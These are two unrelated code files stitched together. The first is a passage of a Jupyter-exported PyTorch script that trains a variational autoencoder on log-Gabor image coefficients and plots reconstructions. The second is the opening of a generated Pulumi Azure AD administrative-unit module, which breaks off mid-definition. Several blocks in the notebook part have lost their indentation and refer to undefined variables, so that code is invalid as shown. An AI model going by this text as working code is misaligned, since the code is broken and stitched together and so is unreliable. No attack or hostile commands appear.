else:'''
'''autoenc = AutoEncoder(n_levels, n_color, n_eccentricity, n_azimuth, n_theta,
n_phase, out_chan=out_chan,
is_VAE=False, residual_encode = True)'''
invLGmap = InverseLogGaborMapper()
autoenc_VAE = AutoEncoder(n_levels, n_color, n_eccentricity, n_azimuth, n_theta,
n_phase, out_chan=out_chan,
is_VAE=True,
residual_encode=True)
# In[1504]:
autoenc_VAE_optimizer = optim.Adam(autoenc_VAE.parameters(), lr = autoenc_lr)
invLG_optimizer = optim.Adam(invLGmap.parameters(), lr = invLG_lr)
criterion = nn.MSELoss() #loss = criterion(outputs, inputs)
# In[1505]:
dataloader = DataLoader(saccade_dataset, batch_size=batch_size,
shuffle=True, num_workers=0)
# In[1506]:
KL_loss_list = []
MSE_loss_list = []
invLG_loss_list = []
# In[1507]:
script_name
# In[1508]:
# Train both models from scratch unless a previously saved checkpoint of the
# inverse mapper exists, in which case everything is loaded from disk.
PATH = script_name + '_invLGmap.pt'
if not os.path.exists(PATH):
    for epoch in range(n_epoch): # loop over the dataset multiple times
        KL_running_loss = 0.0
        MSE_running_loss = 0.0
        invLG_running_loss = 0.0
        for step, data in enumerate(dataloader):
            batch_size_eff = data['img_crop'].shape[0]
            log_gabor_coefs = log_gabor_transform(data['img_crop'], K)
            # Normalizing
            autoenc_inputs = log_gabor_coefs.clone()
            if color_mode == 'rgb':
                autoenc_inputs /= 256 # !! Normalization
            # --- VAE step: reconstruct log-Gabor coefficients. ---
            autoenc_outputs, mu, logvar, z = autoenc_VAE(autoenc_inputs)
            autoenc_VAE_optimizer.zero_grad()
            # Standard VAE objective: reconstruction MSE + KL divergence of
            # the latent posterior from the unit Gaussian prior.
            MSE_loss = 0.5 * nn.MSELoss(reduction='sum')(autoenc_outputs, autoenc_inputs)
            KL_loss = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
            autoenc_VAE_loss = MSE_loss + KL_loss
            autoenc_VAE_loss.backward()
            autoenc_VAE_optimizer.step()
            # --- Inverse-mapper step: detached VAE output -> image pyramid,
            # so gradients do not flow back into the VAE. ---
            invLG_optimizer.zero_grad()
            log_gabor_coefs_rec = autoenc_outputs.detach().view(batch_size_eff*n_levels*n_color,
                                                                n_eccentricity*n_azimuth*n_theta*n_phase)
            img_pyr_rec_rec = invLGmap(log_gabor_coefs_rec)
            img_pyr_targets = data['img_crop'][:,:n_levels,...].contiguous()
            img_pyr_targets = img_pyr_targets.view(batch_size_eff * n_levels * n_color,
                                                   width * width)
            if color_mode == 'rgb':
                # NOTE(review): .contiguous() on an already-contiguous slice
                # returns the same storage, so this in-place divide may also
                # rescale data['img_crop'] itself — confirm this is intended.
                img_pyr_targets /= 256 # !! Normalization
            invLG_loss = nn.MSELoss(reduction='sum')(img_pyr_rec_rec, img_pyr_targets)
            invLG_loss.backward()
            invLG_optimizer.step()
            # print statistics
            KL_running_loss += KL_loss.item()
            MSE_running_loss += MSE_loss.item()
            invLG_running_loss += invLG_loss.item()
            if (step+1)%recording_steps == 0 : # print every n_steps mini-batches
                print('[%d, %5d] losses: %.3f, %.3f, %.3f' %
                      (epoch + 1,
                       step + 1,
                       KL_running_loss/recording_steps,
                       MSE_running_loss/recording_steps,
                       invLG_running_loss/recording_steps))
                #.append
                KL_loss_list.append(KL_running_loss/recording_steps)
                MSE_loss_list.append(MSE_running_loss/recording_steps)
                invLG_loss_list.append(invLG_running_loss/recording_steps)
                KL_running_loss = 0.0
                MSE_running_loss = 0.0
                invLG_running_loss = 0.0
        # Periodically checkpoint the loss histories and both models.
        if epoch % 10 == 0 :
            PATH = script_name + '_KL_loss_list.npy'
            np.save(PATH, np.array(KL_loss_list))
            PATH = script_name + '_MSE_loss_list.npy'
            np.save(PATH, np.array(MSE_loss_list))
            PATH = script_name + '_invLG_loss_list.npy'
            np.save(PATH, np.array(invLG_loss_list))
            PATH = script_name + '_invLGmap.pt'
            torch.save(invLGmap, PATH)
            #PATH = script_name + '_autoenc.pt'
            #torch.save(autoenc, PATH)
            PATH = script_name + '_autoenc_VAE.pt'
            torch.save(autoenc_VAE, PATH)
            print('Model saved')
    print('Finished Training ')
else:
    # Checkpoint found: restore loss histories and both models.
    PATH = script_name + '_KL_loss_list.npy'
    KL_loss_list = np.load(PATH).tolist()
    PATH = script_name + '_MSE_loss_list.npy'
    MSE_loss_list = np.load(PATH).tolist()
    PATH = script_name + '_invLG_loss_list.npy'
    invLG_loss_list = np.load(PATH).tolist()
    PATH = script_name + '_invLGmap.pt'
    invLGmap = torch.load(PATH)
    #PATH = script_name + '_autoenc.pt'
    #autoenc = torch.load(PATH)
    PATH = script_name + '_autoenc_VAE.pt'
    autoenc_VAE = torch.load(PATH)
    print('Model loaded')
# In[1509]:

# Inspect the last batch's first (normalized) input vector.
plt.plot(autoenc_inputs[0,...].detach().numpy().flatten())
# In[1510]:
# Re-run the VAE on the last batch to refresh mu/logvar/z for inspection.
log_gabor_coefs = log_gabor_transform(data['img_crop'], K)
autoenc_inputs = log_gabor_coefs.clone()
autoenc_outputs, mu, logvar, z = autoenc_VAE(autoenc_inputs)
#plt.plot(torch.randn_like(logvar)[0,...].detach().numpy().flatten())
# In[1511]:
out_chan
# In[1512]:
# Manual save block (disabled); mirrors the periodic checkpointing above.
if False :
    PATH = script_name + '_KL_loss_list.npy'
    np.save(PATH, np.array(KL_loss_list))
    PATH = script_name + '_MSE_loss_list.npy'
    np.save(PATH, np.array(MSE_loss_list))
    PATH = script_name + '_invLG_loss_list.npy'
    np.save(PATH, np.array(invLG_loss_list))
    PATH = script_name + '_invLGmap.pt'
    torch.save(invLGmap, PATH)
    #PATH = script_name + '_autoenc.pt'
    #torch.save(autoenc, PATH)
    PATH = script_name + '_autoenc_VAE.pt'
    torch.save(autoenc_VAE, PATH)
    print('Model saved')
# In[1513]:
import seaborn
seaborn.set()
# Plot the three loss histories on one figure; KL and invLG curves are
# scaled (x100, x10) purely for visual comparison.
plt.figure(figsize=(12,12))
plt.plot(np.array(MSE_loss_list), label = 'MSE')
plt.plot(np.array(KL_loss_list)*100, label = 'KL')
plt.plot(np.array(invLG_loss_list)*10, label = 'invLGMap')
#plt.ylim(0,500)
plt.title('LOSS')
plt.xlabel('# batch')
plt.legend()
#plt.ylim(0,1000000000000)
# In[1514]:
# Latent statistics: histograms of the posterior means and log-variances.
plt.hist(mu.detach().numpy().flatten(),20)
plt.figure()
plt.hist(logvar.detach().numpy().flatten(),20)
# ## Encoding and decoding

# In[1515]:

seaborn.reset_orig()
# In[1516]:

# List the image names present in the last training batch.
for i in range(batch_size):
    print(data['name'][i])
# In[1517]:
# Pick a test image and convert it to the working color space.
img_name = 'i1198772915'
if True:
    locpath = '../ALLSTIMULI/' + img_names[10] + '.jpeg'
    locpath = '../ALLSTIMULI/' + data['name'][11] + '.jpeg'  # this one wins
    #locpath = '../ALLSTIMULI/' + img_name + '.jpeg'
    img_orig = Image.open(locpath)
else:
    locpath= '../data/professional_test/test/namphuong-van-260.png'
    locpath= '../data/professional_test/test/shannon-kelley-108053.png'
    img_orig = Image.open(locpath)
#img_orig = img_orig.resize((1024,768))
plt.figure(figsize=(20,15))
if color_mode=='hsv':
    img_orig = rgb2hsv(img_orig)
    plt.imshow(hsv2rgb(img_orig))
elif color_mode=='lab':
    img_orig = rgb2lab(img_orig)
    plt.imshow(lab2rgb(img_orig))
else:
    plt.imshow(img_orig)
# In[1518]:
# HWC image -> NCHW tensor with a singleton batch dimension.
img_tens = torch.Tensor(np.array(img_orig)[None,...]).permute(0,3,1,2)
# In[1519]:
# Build the cropped multi-resolution pyramid for the test image.
img_crop = cropped_pyramid(img_tens,
                           width=width,
                           color=color,
                           do_mask=do_mask,
                           verbose=True,
                           n_levels=n_levels)[0]
# In[1520]:
log_gabor_coeffs = log_gabor_transform(img_crop, K)
log_gabor_coeffs.shape
# In[1521]:
# Round-trip through the (pseudo-inverse) log-Gabor transform and rebuild
# the full image to gauge baseline reconstruction quality.
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
if False:
    img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy() #.clip(0,255).astype('uint8')
plt.figure(figsize=(20,15))
image_show(full_img_rec[0,:], color_mode=color_mode)
N_X, N_Y = full_img_rec.shape[1:3]
# In[1522]:
full_img_rec.shape
# In[1523]:
autoenc_VAE.eval()
autoenc_inputs = log_gabor_coeffs.clone()
if color_mode == 'rgb':
autoenc_inputs /= 256
log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE( autoenc_inputs )
log_gabor_coeffs_rec = log_gabor_coeffs_rec.view(1, n_levels, -1)
if color_mode == 'rgb':
log_gabor_coeffs_rec *= 256
# In[1524]:
z
# In[1525]:
plt.figure(figsize=(20,7))
plt.plot(log_gabor_coeffs.numpy().flatten()[:], label = 'original')
plt.plot(log_gabor_coeffs_rec.detach().numpy().flatten()[:], label = 'reconstructed')
plt.title('LOG GABOR COEFFS')
plt.legend()
for level in range(n_levels):
plt.figure(figsize=(20,4))
plt.plot(log_gabor_coeffs[0,level,...].numpy().flatten(), label = 'original')
plt.plot(log_gabor_coeffs_rec[0,level,...].detach().numpy().flatten(), label = 'reconstructed')
c = np.corrcoef([log_gabor_coeffs[0,level,...].numpy().flatten(), log_gabor_coeffs_rec[0,level,...].detach().numpy().flatten()])[0,1]
plt.title('LOG GABOR COEFFS LEVEL '+str(level)+', corr='+str(c))
plt.legend()
# In[1526]:
_=plt.hist(log_gabor_coeffs.numpy().flatten(),100)
# In[1527]:
_=plt.hist(img_crop.numpy().flatten(),100)
# ## Reconstruction tests
# In[1528]:
# Invert the log-Gabor transform with the pseudo-inverse filter bank; the last
# (coarsest) pyramid level is copied straight from the cropped pyramid.
K_inv = get_K_inv(K, width=width, n_sublevel = n_sublevel, n_azimuth = n_azimuth, n_theta = n_theta, n_phase = n_phase)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
img_rec[:,-1,...] = img_crop[:,-1,...]
axs = tensor_pyramid_display(img_rec.clone())
# In[1529]:
# Feed the VAE-reconstructed coefficients through the learned inverse map
# (invLGmap), flattened to (levels*colors, ecc*azimuth*theta*phase).
inv_LGmap_input = log_gabor_coeffs_rec.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
inv_LGmap_input.shape
# In[1530]:
img_rec_rec = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec = img_rec_rec.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec = torch.cat((img_rec_rec, img_crop[0:,-1:,...]), 1)
#img_rec_rec[0,-1,...] *=0 #+= 128
axs = tensor_pyramid_display(img_rec_rec)
# ### Test invLGmap on the original log gabor coeffs only
# In[1531]:
# Sanity check: apply invLGmap to the *original* (not auto-encoded) coefficients.
img_rec_test = invLGmap(log_gabor_coeffs.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)) #inv_LGmap_input)
img_rec_test = img_rec_test.view(1, n_levels, n_color, width, width).detach()
img_rec_test[:,-1,...] = img_crop[:,-1,...]
axs = tensor_pyramid_display(img_rec_test)
# ### Test the reconstructed coeffs with different values of K_inv
# Sweep the pseudo-inverse regularization cutoff (rcond) and compare
# reconstructions from the original vs the auto-encoded coefficients.
img_rec_rec_test = []
for i, rcond in enumerate((0.1, 0.03, 0.01, 0.003, 0.001, 0)):
    K_ = K.reshape((width**2, n_sublevel*n_azimuth*n_theta*n_phase))
    print('Reshaped filter tensor=', K_.shape)
    if rcond>0:
        K_inv_test = torch.pinverse(K_, rcond=rcond)
    else:
        # rcond == 0 sentinel: fall back to torch's default cutoff.
        K_inv_test = torch.pinverse(K_)
    print('Tensor shape=', K_inv.shape)
    K_inv_test =K_inv_test.reshape(n_sublevel, n_azimuth, n_theta, n_phase, width, width)
    # Reconstruction from the original coefficients with this cutoff.
    img_rcond_test = inverse_gabor(log_gabor_coeffs.detach(), K_inv_test)
    #img_rcond_test[:,-1,...] = img_crop[:,-1,...]
    axs = tensor_pyramid_display(img_rcond_test)
    axs[0].set_title('REGULARIZATION = '+str(rcond)+', ORIGINAL LOG-GABOR COEFS')
    # Reconstruction from the auto-encoded coefficients, kept for later reuse.
    img_rec_rcond_test = inverse_gabor(log_gabor_coeffs_rec.detach(), K_inv_test)
    #img_rec_rcond_test[:,-1,...] = img_crop[:,-1,...]
    img_rec_rec_test.append(img_rec_rcond_test)
    axs = tensor_pyramid_display(img_rec_rcond_test)
    axs[0].set_title('AUTO-ENCODER LOG-GABOR RECONSTRUCTION')
# ### Full image reconstruction
# In[1532]:
#img_crop = cropped_pyramid(img_tens, color=color, do_mask=do_mask, verbose=True, n_levels=n_levels)[0]
N_X, N_Y = full_img_rec.shape[1:3]
# Three full-image reconstructions, one figure each: from the cropped pyramid,
# from the log-Gabor coefficients, and from the auto-encoder output.  Titles
# report the parameter count of each representation.
full_img_crop = inverse_pyramid(img_crop, color=color, gauss=gauss, n_levels=n_levels)
full_img_crop = full_img_crop.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_crop[0,:], color_mode)
plt.title('RECONSTRUCTED FROM CROPPED PYRAMID, #params = ' + str(np.prod(img_crop[0,...].size())), fontsize=20)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
#img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_rec[0,:], color_mode)
plt.title('RECONSTRUCTED FROM LOG GABOR COEFFS, #params = ' + str(np.prod(log_gabor_coeffs[0,...].size())), fontsize=20)
full_img_rec_rec = inverse_pyramid(img_rec_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec = full_img_rec_rec.detach().permute(0,2,3,1).numpy()
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec[0,:], color_mode)
plt.title('RECONSTRUCTED FROM AUTO-ENCODER, #params = ' + str(out_chan), fontsize=20)
'''
img_rec_rec_test[3][:,-1,...]= img_crop[:,-1,...]
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test[3], color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy().clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
plt.imshow(full_img_rec_rec_test[0,:])
plt.title('RECONSTRUCTED FROM AUTOENCODER OUTPUTS AND REGULARIZED INVERSE MAP')
'''
# Disabled figure export; flip to True to save the figure to disk.
if False:
    plt.savefig(script_name+'_soleil_levant.png', bbox_inches='tight')
# In[1533]:
#img_crop = cropped_pyramid(img_tens, color=color, do_mask=do_mask, verbose=True, n_levels=n_levels)[0]
# 4-panel comparison (original / cropped pyramid / log-Gabor / auto-encoder),
# each cropped to the central 256x256 window around the image center.
plt.figure(figsize=(20,60))
plt.subplot(4,1,1)
img = img_tens.detach().permute(0,2,3,1).numpy()
N_X, N_Y = img.shape[1:3]
image_show(img[0,N_X//2-128:N_X//2+128,
               N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('ORIGINAL IMAGE, #params = ' + str(np.prod(img_tens[0,...].size())), fontsize=20)
plt.subplot(4,1,2)
full_img_crop = inverse_pyramid(img_crop, color=color, gauss=gauss, n_levels=n_levels)
full_img_crop = full_img_crop.detach().permute(0,2,3,1).numpy()
N_X, N_Y = full_img_crop.shape[1:3]
image_show(full_img_crop[0,N_X//2-128:N_X//2+128,
                         N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM CROPPED PYRAMID, #params = ' + str(np.prod(img_crop[0,...].size())), fontsize=20)
plt.subplot(4,1,3)
img_rec=inverse_gabor(log_gabor_coeffs.detach(), K_inv)
#img_rec[:,-1,...]= img_crop[:,-1,...]
full_img_rec = inverse_pyramid(img_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec = full_img_rec.detach().permute(0,2,3,1).numpy()
image_show(full_img_rec[0,N_X//2-128:N_X//2+128,
                        N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM LOG GABOR COEFFS, #params = ' + str(np.prod(log_gabor_coeffs[0,...].size())), fontsize=20)
plt.subplot(4,1,4)
full_img_rec_rec = inverse_pyramid(img_rec_rec, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec = full_img_rec_rec.detach().permute(0,2,3,1).numpy()
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
image_show(full_img_rec_rec[0,N_X//2-128:N_X//2+128,
                            N_Y//2-128:N_Y//2+128,:], color_mode)
plt.title('RECONSTRUCTED FROM AUTO-ENCODER, #params = ' + str(np.prod(code[0,...].shape)), fontsize=20)
'''
img_rec_rec_test[3][:,-1,...]= img_crop[:,-1,...]
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test[3], color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy().clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
plt.imshow(full_img_rec_rec_test[0,:])
plt.title('RECONSTRUCTED FROM AUTOENCODER OUTPUTS AND REGULARIZED INVERSE MAP')
'''
# Disabled figure export; flip to True to save the comparison figure.
if False:
    plt.savefig(script_name+'.png', bbox_inches='tight')
# In[1534]:
img.shape
# Roll the reconstructed coefficients along dim 4 (azimuth) and dim 1 (level)
# of the 7-D view: per the title below, this simulates a rotation/zoom of the
# decoded image in the log-polar representation.
log_gabor_coeffs_roll = log_gabor_coeffs_rec.clone()
log_gabor_coeffs_roll = log_gabor_coeffs_roll.view(1,n_levels, n_color, n_eccentricity, n_azimuth, n_theta, n_phase)
#log_gabor_coeffs_roll[:,:n_levels-1,...]= log_gabor_coeffs_roll[:,:n_levels-1,...].roll(-4,4) #.roll(4, 4)
log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(1,4) #.roll(4, 4)
log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(1,1) #.roll(4, 4)
#log_gabor_coeffs_roll= log_gabor_coeffs_roll.roll(-1,5) #.roll(4, 4)
inv_LGmap_input = log_gabor_coeffs_roll.view((n_levels) * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
img_rec_rec_roll = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec_roll = img_rec_rec_roll.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec_roll = torch.cat((img_rec_rec_roll, img_crop[0:,-1:,...]), 1)
full_img_rec_rec_roll = inverse_pyramid(img_rec_rec_roll, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_roll = full_img_rec_rec_roll.detach().permute(0,2,3,1).numpy()
if color_mode == 'rgb':
    # uint8 clipping only makes sense for 0-255 RGB data.
    full_img_rec_rec_roll = full_img_rec_rec_roll.clip(0,255).astype('uint8')
#ax = tensor_image_cmp(full_img_rec, full_img_rec_rec)
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec_roll[0,:], color_mode)
plt.title('ROTATION/ZOOM FROM COMPRESSED SENSING LAYER')
#log_gabor_coeffs_roll[:,:n_levels-1,...] = log_gabor_coeffs_roll[:,:n_levels-1,...].roll(1,1) #.roll(4, 4)
# In[1535]:
# Latent-space experiment: replace the encoder's z with scaled random noise
# (z_in) and decode, then rebuild the full image from the result.
z_test = torch.randn_like(mu)
logvar.shape
autoenc.out_chan
autoenc_inputs.shape
log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE( autoenc_inputs)
z_in = torch.randn_like(mu) * 30
log_gabor_coeffs_rec_test, mu, logvar, z = autoenc_VAE( autoenc_inputs, z_in=z_in )
inv_LGmap_input = log_gabor_coeffs_rec_test.view(n_levels * n_color, n_eccentricity * n_azimuth * n_theta * n_phase)
img_rec_rec_test = invLGmap(inv_LGmap_input) #inv_LGmap_input)
img_rec_rec_test = img_rec_rec_test.view(1, n_levels, n_color, width, width).detach()
#img_rec_rec_test = torch.cat((img_rec_rec_test, img_crop[0:,-1:,...]), 1)
full_img_rec_rec_test = inverse_pyramid(img_rec_rec_test, color=color, gauss=gauss, n_levels=n_levels)
full_img_rec_rec_test = full_img_rec_rec_test.detach().permute(0,2,3,1).numpy()
plt.figure(figsize=(20,15))
image_show(full_img_rec_rec_test[0,:], color_mode)
# In[1536]:
# Zero out the first 6 entries along dim 1 (presumably the 6 finest pyramid
# levels -- TODO confirm) to probe how the VAE completes missing information.
log_gabor_coeffs = log_gabor_transform(img_crop, K)
autenc_inputs_VAE_test = log_gabor_coeffs.clone()
autenc_inputs_VAE_test[0,:6,...] = 0
plt.figure()
plt.plot(autenc_inputs_VAE_test.detach().numpy().flatten())
# In[1537]:
#log_gabor_coeffs_rec, mu, logvar, z = autoenc_VAE(autenc_inputs_test)
z_in = None #torch.randn_like(mu) * 30
log_gabor_coeffs_rec_test, mu, logvar, z | |
<filename>sdk/python/pulumi_azuread/administrative_unit.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AdministrativeUnitArgs', 'AdministrativeUnit']
@pulumi.input_type
class AdministrativeUnitArgs:
    # NOTE(review): tfgen-generated input type -- changes here are lost on the
    # next codegen run; prefer regenerating over hand-editing.
    def __init__(__self__, *,
                 display_name: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
                 members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 prevent_duplicate_names: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a AdministrativeUnit resource.
        :param pulumi.Input[str] display_name: The display name of the administrative unit.
        :param pulumi.Input[str] description: The description of the administrative unit.
        :param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
        :param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
        :param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
        """
        pulumi.set(__self__, "display_name", display_name)
        # Optional inputs are recorded only when supplied, so the engine can
        # distinguish "unset" from an explicit value.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if hidden_membership_enabled is not None:
            pulumi.set(__self__, "hidden_membership_enabled", hidden_membership_enabled)
        if members is not None:
            pulumi.set(__self__, "members", members)
        if prevent_duplicate_names is not None:
            pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
    # Accessors below delegate storage to pulumi.get/pulumi.set, which the
    # @pulumi.input_type decorator wires to the resource's input map.
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Input[str]:
        """
        The display name of the administrative unit.
        """
        return pulumi.get(self, "display_name")
    @display_name.setter
    def display_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "display_name", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the administrative unit.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="hiddenMembershipEnabled")
    def hidden_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the administrative unit and its members are hidden or publicly viewable in the directory
        """
        return pulumi.get(self, "hidden_membership_enabled")
    @hidden_membership_enabled.setter
    def hidden_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "hidden_membership_enabled", value)
    @property
    @pulumi.getter
    def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
        """
        return pulumi.get(self, "members")
    @members.setter
    def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "members", value)
    @property
    @pulumi.getter(name="preventDuplicateNames")
    def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
        """
        If `true`, will return an error if an existing administrative unit is found with the same name
        """
        return pulumi.get(self, "prevent_duplicate_names")
    @prevent_duplicate_names.setter
    def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "prevent_duplicate_names", value)
@pulumi.input_type
class _AdministrativeUnitState:
    # NOTE(review): tfgen-generated state type (all fields optional, plus the
    # provider-assigned object_id); edits are lost on the next codegen run.
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
                 members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 object_id: Optional[pulumi.Input[str]] = None,
                 prevent_duplicate_names: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering AdministrativeUnit resources.
        :param pulumi.Input[str] description: The description of the administrative unit.
        :param pulumi.Input[str] display_name: The display name of the administrative unit.
        :param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
        :param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
        :param pulumi.Input[str] object_id: The object ID of the administrative unit.
        :param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
        """
        # Only explicitly provided state fields are stored.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if hidden_membership_enabled is not None:
            pulumi.set(__self__, "hidden_membership_enabled", hidden_membership_enabled)
        if members is not None:
            pulumi.set(__self__, "members", members)
        if object_id is not None:
            pulumi.set(__self__, "object_id", object_id)
        if prevent_duplicate_names is not None:
            pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the administrative unit.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        The display name of the administrative unit.
        """
        return pulumi.get(self, "display_name")
    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)
    @property
    @pulumi.getter(name="hiddenMembershipEnabled")
    def hidden_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the administrative unit and its members are hidden or publicly viewable in the directory
        """
        return pulumi.get(self, "hidden_membership_enabled")
    @hidden_membership_enabled.setter
    def hidden_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "hidden_membership_enabled", value)
    @property
    @pulumi.getter
    def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
        """
        return pulumi.get(self, "members")
    @members.setter
    def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "members", value)
    @property
    @pulumi.getter(name="objectId")
    def object_id(self) -> Optional[pulumi.Input[str]]:
        """
        The object ID of the administrative unit.
        """
        return pulumi.get(self, "object_id")
    @object_id.setter
    def object_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "object_id", value)
    @property
    @pulumi.getter(name="preventDuplicateNames")
    def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
        """
        If `true`, will return an error if an existing administrative unit is found with the same name
        """
        return pulumi.get(self, "prevent_duplicate_names")
    @prevent_duplicate_names.setter
    def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "prevent_duplicate_names", value)
class AdministrativeUnit(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Manages an Administrative Unit within Azure Active Directory.
## API Permissions
The following API permissions are required in order to use this resource.
When authenticated with a service principal, this resource requires one of the following application roles: `AdministrativeUnit.ReadWrite.All` or `Directory.ReadWrite.All`
When authenticated with a user principal, this resource requires one of the following directory roles: `Privileged Role Administrator` or `Global Administrator`
## Import
Administrative units can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/administrativeUnit:AdministrativeUnit example 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the administrative unit.
:param pulumi.Input[str] display_name: The display name of the administrative unit.
:param pulumi.Input[bool] hidden_membership_enabled: Whether the administrative unit and its members are hidden or publicly viewable in the directory
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: A set of object IDs of members who should be present in this administrative unit. Supported object types are Users or Groups.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing administrative unit is found with the same name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AdministrativeUnitArgs,
